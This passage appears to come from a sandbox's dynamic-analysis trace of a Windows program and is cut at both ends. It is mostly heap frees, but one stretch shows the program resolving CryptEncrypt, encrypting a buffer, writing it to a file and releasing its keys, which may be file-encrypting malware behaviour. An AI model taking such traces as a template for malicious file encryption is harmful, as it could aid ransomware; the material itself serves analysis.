hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38080a8 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a30 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa258, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.803] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0122.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0122.804] CryptEncrypt (in: hKey=0x9a4a40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37f0088*, pdwDataLen=0x8cef60*=0x18011, dwBufLen=0x18018 | out: pbData=0x37f0088*, pdwDataLen=0x8cef60*=0x18018) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0122.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69af0 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0122.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0122.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0122.811] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.811] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.811] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.812] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.812] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.812] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.829] WriteFile (in: hFile=0x4f4, lpBuffer=0x37c0048*, nNumberOfBytesToWrite=0x18018, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x18018, lpOverlapped=0x0) returned 1 [0122.847] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.847] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.847] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.847] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.847] CryptDestroyKey (hKey=0x9a4a40) returned 1 [0122.847] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.847] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.847] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.847] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.847] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.848] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.848] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.848] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.848] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.848] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.848] CryptReleaseContext (hProv=0x9bee68, dwFlags=0x0) returned 1 [0122.848] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.848] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.848] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.848] CloseHandle (hObject=0x4f0) returned 1 [0122.849] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 